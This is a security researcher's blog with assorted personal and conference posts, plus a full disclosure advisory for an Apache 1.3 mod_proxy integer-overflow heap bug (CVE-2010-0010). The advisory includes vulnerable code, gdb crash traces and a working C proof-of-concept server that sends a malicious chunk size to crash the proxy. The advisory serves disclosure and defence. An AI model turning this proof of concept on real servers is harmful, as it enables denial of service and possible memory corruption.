Long time ago, far away after mountains and forests was living OpenSSH bug… 😉 This vulnerability existed in the authentication algorithm for GSSAPI module. Every piece of the code pinted to the pre-authentication bug…

Seriously, after a few time of research (un)fortunately this bug is directly after REAL authentication. So this is post-auth bug 🙁 One call less and this will be funny pre-authentication bug… This is the reason why this bug is useless in fact and public now 😉

Here is simple advisory 😉

21

Jul

by pi3

Finally! 19 of July 2011 I had defence of my Master of Degree. I pass exam from whole study at mark 5.5 (the highest mark) and defence my thesis with mark 5.5 (the highest mark) and on the diploma I’m going to have final mark 5.0 (almost the highest mark ;)). My thesis was interesting not only for me but also for my University and they want to send it to the contest 😉 My topic was: “Elaboration of an automatic system of fuzz testing technique to use in the CERN grid applications”. To be honest now I have very powerful fuzzer ;>

11

Mar

by pi3

I had a long delay in posting on the blog… Several reasons made this situation:

*) When I came back from CERN to my family city I had only a few days to move to the city where I’m studying (~650 km from my family city)

*) I need to bought a car because of moving my staff to another city  (I love Toyota RAV4 – the best cars from the 2000-2005 years, unbreakable! :>)

*) I’m also studying a pedagogic

*) I had A LOT OF exams – in the both faculties ~20 exams – finally I pass everything ! 🙂

*) Parallel I started work in the Wroclaw Centre of Networking and Supercomputing (thanks to Bartlomiej Balcerek and Pawel Dziekonski). I was doing pentests and auditing the source code at the PL-GRID project…

*) Parallel I was discussing with some guys from CERN about my thesis and new project in the security team…

… finally I came back to CERN once again 😉 I’m working in the Security Team for one of the project which will make Linux system safer and parallel I’m working on my thesis from Computer Science – cooperated with CERN, and I’m working on my thesis from Pedagogic (f**! I must finish it up to 14th of March 2011 ;>).

 

A few news:

1. When I was working at the WCSS, we found with friends (Bartlomiej Balcerek and Maciej Kotowicz) very nice remote overflow bug in Torque server 😉 In fact exploitable 😉

2. Phrack 68 is going out close to May 2011

3. The new funny website arose – http://niekoniecznik.pl 😉 Unfortunately it is only in Polish language. It ridicules new trend in “security” – publishing every shit as it can be – unexploitable bugs, vulnerabilites which can do DoS of your client, etc 😉

3

Oct

by pi3

27 września odbyla sie konferencja SecDay 2010, na ktorej mimalem przyjemnosc wyglaszac swoja prelekcje “Linux vs rootkits”. Mozna ja sciagnac tutaj.

Moje wrazenia po konferencji sa pozytywne. W tym roku Lukasz postawil na Politechnike Wroclawska, na ktorej odbywaly sie wyklady. Byla to konferencja jednodniowa, ale za to za free 😉 Wystarczylo sie wczesniej zarejestrowac. Na swoim wykladzie naliczylem okolo 140 osob, wiec nie bylo zle 😉

Tematy i poziom wykladow byl bardzo zroznicowany, wiec kazdy mogl znalezc cos dla siebie. Podobala mi sie prelekcja j00ru, ktory poruszyl temat zmian architekturalnych (x86 -> x86_64) z punktu widzenia exploitacji bledow. Jak zwykle jestem tez fanem wykladu Grzegorza Blonskiego – “‘przecieki’ elektromagnetyczne” ze wzgledu na bardzo ciekawa tematyke. Jest on chyba nieliczna osoba w Polsce zajmujaca sie owa tematyka. Konrad Zuwala staral sie przyblizyc jak mozna wykorzystac idee wirtualizacji do ukrywania dzialania niektorych programow. Mateusz ‘shm’ Kocielski poopowiadal nam o fuzzowaniu interpretera jezyka php i pokazal ze najkrotszy kod, ktory potrafi go ‘wykrzaczyc’ ma jedynie 11 bajtow 😉 Pawel Golen postaral sie przyblizyc nam problemy bankowoscic elektronicznej, a Michal Kediora poruszyl temat informatyki sledczej co wywolalo ciekawa dyskusje na sali. Tudziez nalezy przytoczyc cytat jednego ze sluchaczy: “Zabrali im komputer 5 lat temu. Kiedy mi go oddadza?” 😀 Usmialem sie jak malo kiedy 😉

Co do mojej prezentaji… nie mi ja oceniac, ale postaralem sie ja poprowadzic najlepiej jak potrafie i mialem bardzo pozytywny feedback, oraz mnostwo pytan w czasie i po wykladzie, wiec czulem sie spelniony 😉 Osiagnalem swoj cel 😉

Prawdopodobnie  za rok znowu bedzie SecDay… tym razem 2011. Jak bede w Polsce mozliwe ze uda mim sie o czyms opowiedziec 😉

Pozdrawiam,

Adam Zabrocki

27

Jul

by pi3

Today (27.07.2010) I’m going to the hospital (Hospital de la Tour) for surgery… I don’t know how long I’m going to stay in the hospital after the surgery and when I will be available… Wish me good luck!

Best regards,

Adam Zabrocki

In co-operation with Maksymilian Arciemowicz we were analysing implementation of  OPIE Authentication System on FreeBSD. The result is discovered off-by-one vulnerability in library ‘libopie’. The most interesting point of this vulnerability is a possibility to exploit it pre-auth remotely!

A lot of softwares using this library for authentication module. For example FreeBSD team change a little the source of  the OpenSSH. They added in some places the code which use the libopie 😉 The same changed code is used by DragnoflyBSD. OpenSuSe is using libopie too. Novell systems too.

We’ve analysed exploiting way in default FTP daemon for FreeBSD 8.0. Official FreeBSD’s advisory is available here.

Out advisory is available here and here and… check the bugtraq list 😉

Best regards,

Adam Zabrocki

Yesterday (30 of April) I gave a lecture in WA (White Area) at CERN. I was talking about my new project (in fact Master of Degree thesis topic). This is automated testing tool which uses fuzzing technique. It can be used for generate CLI, API, Unit, Functionally, Regression, … , tests – in fact we can use it for all types of tests. Generated programs are independent from language. It can generate output program in JAVA, C, C++, Assembler, Python, Perl, C#, … languages – we can simply add new modules for add new languages.  To be more flexible, framework used Aspect-Oriented Programming  (AOP). First beta version of framework is published on CERN svn servers. It is integrated with DPM CLI tests and works pretty well 😉

In the future maybe I will publish some more details.

Btw. This project can be simply adapted for search vulnerabilities in software 😉

Best regards,

Adam Zabrocki

1

Mar

by pi3

28th of February I had a IT group meeting.  On this meeting I had been giving lecture about modern rootkits, virus and malwares for 1 hour. The presentation give a point for malware called bankers, attacks for device (skimming), new attack for CHIP cards, and how rootkits hide in *NIX systems. I have had really positive feedback so I’m happy that people likes my talking 🙂 Personally I think it wasn’t bad 🙂

I can’t publish my presentation but if you know me I can talk with you about my topic of lecture 🙂

Best regards,

Adam Zabrocki

10

Feb

by pi3

CERN openlab / Intel Computer Architecture and Performance Tuning Workshop Winter 2010… From 9:00 (9th of February) until 17:00 (10th of February) openlab are filled by people who wants to learn smth from Intel’s guys… At the beginning I want to say that one of the speaker will be Polish guy – Andrzej Nowak. Here is short plan of lectures:

Day 1 - Feb 9th 2010

09:00, 5'        Introduction - Sverre Jarp, CERN openlab
09:05, 75'       Scalability in software and hardware -
                 -tuning performance in 7 dimensions
                 - Sverre Jarp, CERN openlab
10:20, 10'       Break
10:30, 20'       Systematic benchmarking - Jeff Arnold, Intel
10:50, 30'       Compiler overview - Sverre Jarp, CERN openlab
11:20, 10'       Break
11:30, 60'       Understunding performance tuning
                 - Andrzej Nowak, CERN openlab
12:30, 90'       Lunch (by own)
14:00, 2h 30'    Lab exercises
16:30, 30'       Exercises summary + Q&A

Day 2 - Feb 10th 2010

09:00, 45'       Vectorization - Andrzej Nowak, CERN openlab
09:45, 45'       Guest speaker: C++ optimization -
                 - Lorenzo Montea, CERN
10:30, 10'       Break
10:40, 30'       Floating point computation - Jeff Arnold, Intel
11:10, 30'       NUMA memory systems - Julien Leduc, CERN openlab
11:40, 10'       Break
11:50, 45'       Advanced performance tuning and compilers
                 - Jeff Arnold, Intel
12:35, 85'       Lunch (by own)
14:00, 2h 30'    Exercises summary + Q&A


After all lectures what I’ve heard (not everything),  lecture about Vectorization was the best (for me :>). Greetings for Andrzej Nowak 🙂

CVE-2010-0010: Apache mod_proxy vulnerability

After contact with Apache security team i can publish new advisory. This bug exists only in apache 1.3 version in mod_proxy modules, only in 64 bits architecture.

I would like to thanks Colm MacCárthaigh – the guy responsible for contact with me and patch this hole.

Bugfix is available in a forthcoming version of Apache 1.3.x.

If you have any question just contact with me. Advisory is avaible here:

Name:                      Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.
Author:                    Adam Zabrocki (<pi3@itsec.pl> or <zabrocki@cern.ch>)
Date:                      Jan 27, 2010


   Issue:

Mod_proxy from apache 1.3.xx (tested on latest version - 1.3.41) allows local and remote attackers
to overflow buffer on heap via integer overflow vulnerability.


   Description:

Mod_proxy implements a proxy/cache for Apache. It implements proxying capability for FTP, CONNECT (for SSL),
HTTP/0.9, HTTP/1.0, and (as of Apache 1.3.23) HTTP/1.1. The module can be configured to connect to other
proxy modules for these and other protocols.


   Details:


Let's look in code:

"./src/modules/proxy/proxy_util.c"
long int ap_proxy_send_fb(BUFF *f, request_rec *r, cache_req *c, off_t len, int nowrite, int chunked, size_t recv_buffer_size)
{

...
    size_t buf_size;
    long remaining = 0;
...

    for (end_of_chunk = ok = 1; ok;) {
...
        if (chunked) {
            long chunk_start = 0;
            n = 0;

            /* start of a new chunk */
            if (end_of_chunk) {
                end_of_chunk = 0;
                /* get the chunk size from the stream */
                chunk_start = ap_getline(buf, buf_size, f, 0);    <----------------  [0] reading line from traffic (socket)
                if ((chunk_start <= 0) || ((size_t)chunk_start + 1 >= buf_size) || !ap_isxdigit(*buf)) {
                    n = -1;
                }
                /* parse the chunk size */
                else {
                    remaining = ap_get_chunk_size(buf);           <----------------  [1] convert readed data to 'long' size!
                    if (remaining == 0) { /* Last chunk indicated, get footers */
...
...
                        }
                    }
                    else if (remaining < 0) {
                        n = -1;
                        ap_log_rerror(APLOG_MARK, APLOG_DEBUG|APLOG_NOERRNO, r,
                                      "proxy: remote protocol error, invalid chunk size");
                    }
                }
            }

            /* read the chunk */
            if (remaining > 0) {
                n = ap_bread(f, buf, MIN((int)buf_size, (int)remaining));     <------------- [2] convert 'long' to 'int' !!!!
                if (n > -1) {
                    remaining -= n;
                    end_of_chunk = (remaining == 0);
                }
            }
...
...
}

OK. We have simple flow in this code:

-> server read header
-> if it is chunked connection
  -> [0] server will wait and then read data from socket (size of the chunk)
  -> simple check what server received
  -> [1] convert received data to 'long' type
  -> if there is possitive chunk size
     -> [2] directly convert 'long' to 'int' type    <- here is integer overflow bug in amd64 architecture !!!
     -> copy data using converted type


Vulnerability exists only in 64 bits architectures when server directly convert 'long' type to 'int'.
On 64 bits architectures:
   long - 8 bytes
   int  - 4 bytes

When we have conversion from 'long' to 'int' in 64 bits architectures, directly is removed lower 4 bytes.

OK. Let's find calls to this vulnerable function:
./src/modules/proxy/proxy_cache.c:            ap_proxy_send_fb(c->origfp, r, c, c->len, 1, 0, IOBUFSIZE);
./src/modules/proxy/proxy_cache.c:            ap_proxy_send_fb(c->origfp, r, c, c->len, 1, 0, IOBUFSIZE);
./src/modules/proxy/proxy_cache.c:        ap_proxy_send_fb(c->origfp, r, c, c->len, r->header_only, 0, IOBUFSIZE);
./src/modules/proxy/proxy_cache.c:        ap_proxy_send_fb(cachefp, r, NULL, c->len, 0, 0, IOBUFSIZE);
./src/modules/proxy/proxy_ftp.c:            ap_proxy_send_fb(data, r, c, -1, 0, 0, conf->io_buffer_size);
./src/modules/proxy/proxy_http.c:        ap_proxy_send_fb(f, r, c, c->len, 0, chunked != NULL, 

I was testing mod_proxy for http configuration. How it works in details?

client ---------> Server  < -- (mod_proxy_XXX) -- > Other server
                   ^
                   |
                   |
                   -> CACHE (proxy cache)

Proof of Concept which I attached to this advisory causes vulnerability in connection:
                Server < ---- > Other server
... but as we can see (calls to vuln function) probably there is some opportunity
to trigger this vulnerability from CACHE (proxy cache).

In real world this vulnerability is dangerous for open proxy servers. In pentesting could be useful
to attack server behind other servers... but... everyone knows probably better vectors :)


   Proof of concept

[root@pi3-test apache]# gdb -q ./bin/httpd
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully 
qualified domain name, using 127.0.0.1 for ServerName

Program received signal SIGSEGV, Segmentation fault.
0x0000003fec682958 in memcpy () from /lib64/libc.so.6
Missing separate debuginfos, use: debuginfo-install expat-2.0.1-6.fc11.1.x86_64 
glibc-2.10.1-5.x86_64 nss-softokn-freebl-3.12.4-3.fc11.x86_64
(gdb) bt
#0  0x0000003fec682958 in memcpy () from /lib64/libc.so.6
#1  0x000000000043083c in inet_addr ()
#2  0x000000000042a796 in inet_addr ()
#3  0x000000000042975f in inet_addr ()
#4  0x000000000041d8f5 in inet_addr ()
#5  0x0000000000432a29 in inet_addr ()
#6  0x000000000044bc88 in inet_addr ()
#7  0x000000000044bceb in inet_addr ()
#8  0x0000000000441344 in inet_addr ()
#9  0x0000000000441521 in inet_addr ()
#10 0x00000000004416a7 in inet_addr ()
#11 0x0000000000441f5f in inet_addr ()
#12 0x0000000000442820 in inet_addr ()
#13 0x0000003fec61ea2d in __libc_start_main () from /lib64/libc.so.6
#14 0x0000000000403399 in inet_addr ()
#15 0x00007fffffffe618 in ?? ()
#16 0x000000000000001c in ?? ()
#17 0x0000000000000002 in ?? ()
#18 0x00007fffffffe87d in ?? ()
#19 0x00007fffffffe899 in ?? ()
#20 0x0000000000000000 in ?? ()
(gdb) x/i $rip
0x3fec682958 <memcpy+792>:      mov    %r11,0x20(%rdi)
(gdb) i r rdi
rdi            0x6d1fde 7151582
(gdb) i r r11
r11            0x0      0
(gdb)


OK. Let's do the same with debug symbols:

[root@pi3-test apache_1.3.41]# gdb -q ./src/httpd 
(gdb) r -X
Starting program: /root/mod_proxy/apache_1.3.41/src/httpd -X
[Wed Dec 30 17:00:37 2009] [alert] httpd: Could not determine the server's fully 
qualified domain name, using 127.0.0.1 for ServerName

Program received signal SIGSEGV, Segmentation fault.
0x0000003fec682958 in memcpy () from /lib64/libc.so.6
Missing separate debuginfos, use: debuginfo-install expat-2.0.1-6.fc11.1.x86_64 
glibc-2.10.1-5.x86_64 nss-softokn-freebl-3.12.4-3.fc11.x86_64
(gdb) bt
#0  0x0000003fec682958 in memcpy () from /lib64/libc.so.6
#1  0x000000000043083c in ap_bread (fb=0x6bb120, buf=0x6bfd98, nbyte=-65536) at buff.c:776
#2  0x000000000042a796 in ap_proxy_send_fb (f=0x6bb120, r=0x6b9960, c=0x6bacc0, len=-1,
    nowrite=0, chunked=1, recv_buffer_size=8192) at proxy_util.c:536
#3  0x000000000042975f in ap_proxy_http_handler (r=0x6b9960, c=0x6bacc0,
    url=0x6bacae "http://127.0.0.1/", proxyhost=0x0, proxyport=0) at proxy_http.c:636
#4  0x000000000041d8f5 in proxy_handler (r=0x6b9960) at mod_proxy.c:395
#5  0x0000000000432a29 in ap_invoke_handler (r=0x6b9960) at http_config.c:476
#6  0x000000000044bc88 in process_request_internal (r=0x6b9960) at http_request.c:1299
#7  0x000000000044bceb in ap_process_request (r=0x6b9960) at http_request.c:1315
#8  0x0000000000441344 in child_main (child_num_arg=0) at http_main.c:4885
#9  0x0000000000441521 in make_child (s=0x68f0b0, slot=0, now=1262188837) at http_main.c:5000
#10 0x00000000004416a7 in startup_children (number_to_start=5) at http_main.c:5083
#11 0x0000000000441f5f in standalone_main (argc=2, argv=0x7fffffffe608) at http_main.c:5430
#12 0x0000000000442820 in main (argc=2, argv=0x7fffffffe608) at http_main.c:5773
(gdb) up
#1  0x000000000043083c in ap_bread (fb=0x6bb120, buf=0x6bfd98, nbyte=-65536) at buff.c:776
776             memcpy(buf, fb->inptr, nbyte);
(gdb) print nbyte
$1 = -65536
(gdb) print (unsigned int)nbyte
$2 = 4294901760
(gdb) list
771     #ifdef CHARSET_EBCDIC
772             if (fb->flags & B_ASCII2EBCDIC)
773                 ascii2ebcdic(buf, fb->inptr, nbyte);
774             else
775     #endif /*CHARSET_EBCDIC*/
776             memcpy(buf, fb->inptr, nbyte);
777             fb->incnt = nrd - nbyte;
778             fb->inptr += nbyte;
779             return nbyte;
780         }


--- server.c ---
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <pthread.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <fcntl.h>

#define PORT 80
#define sys_err(x)                         \
do {                                       \
   fprintf(stderr,"%s",x);                 \
   exit(-1);                               \
} while(0)

void *parse_me(void *arg);

int main(int argc, char *argv[]) {

   int r_sock,connfd,tmp,tmp2;
   struct sockaddr_in saddr;
   pthread_t bo_tak;
   struct stat statbuf;

   if ( (r_sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
      sys_err("Socket()!\n");

   tmp=sizeof(struct sockaddr_in);
   memset(&saddr,0x0,tmp);
   saddr.sin_family      = PF_INET;
   saddr.sin_port        = htons(PORT);
   saddr.sin_addr.s_addr = htonl(INADDR_ANY);

   if (bind(r_sock, (struct sockaddr *) &saddr, tmp) == -1)
      sys_err("Bind()!\n");

   if ( (listen(r_sock,0x666)) != 0)
      sys_err("Listen()!\n");

pierw_p:

   while (1) {
      if ( (connfd=accept(r_sock,(struct sockaddr*)&saddr,(socklen_t *)&tmp)) < 0) {
         if (errno == EINTR)
            goto pierw_p;
         else
            sys_err("Accept()!\n");
      }
      if ( (tmp2=pthread_create(&bo_tak,NULL,parse_me,(void *)connfd/*&tymczasowe*/) != 0))
         sys_err("Accept() => Blad przy tworzeniu watku! Wychodze...");
   }
}

void *parse_me(void *arg) {

   int sock = (int)arg;
   char buf[4096];
   char *head = "HTTP/1.1 200 OK\r\n"
                "Date: Sat, 66 Dec 666 23:56:50 GMT\r\n"
                "Server: pi3 (pi3 OS)\r\n"
                "X-Powered-By: pi3\r\n"
                "Connection: close\r\n"
                "Transfer-Encoding: chunked\r\n"
                "Content-Type: text/html; charset=UTF-8\r\n\r\n";

   memset(buf,0x0,4096);
   read(sock,buf,4096);
   write(sock,head,strlen(head));
   write(sock,"10000000FFFF0000\n",17);
   while(1)
      write(sock,"A",1);
}
---   EOF    ---

   Greets

+) Kochana Ewa :* :)
+) Guys from HISPASEC, snoop, thorkill, Piotr Bania, tmg, guys from isec.pl,
   guys from SecurityReason, #lam3rz@IRCNET and #plhack@IRCNET
+) Colm MacCárthaigh from apache security team.


   Disclaimer

This document and all the information it contains is provided "as is",
without any warranty. The author is not responsible for the
misuse of the information provided in this advisory. The advisory is
provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing
that no changes are made and that the copyright notices and
disclaimers remain intact.


   Ending words...

That's all. I have tested it on/with latest apache version - 1.3.41.
Probably all versions 1.3.xx are vulnerability.

- Thanks and Best regards Adam Zabrocki (pi3 / pi3ki31ny).


   BUGFIX:

Fix is available in a forthcoming version of Apache 1.3.x.


   Disclosure Timeline

*) 27 Jan,  2010  -  release advisory
...
*) 06 Jan,  2010  -  release patch
...
...
*) 30 Dec,  2009  -  contact with vendor
*) 24 Dec,  2009  -  exploit bug and write advisory
*) 04 Sept, 2009  -  found bug

--
http://pi3.com.pl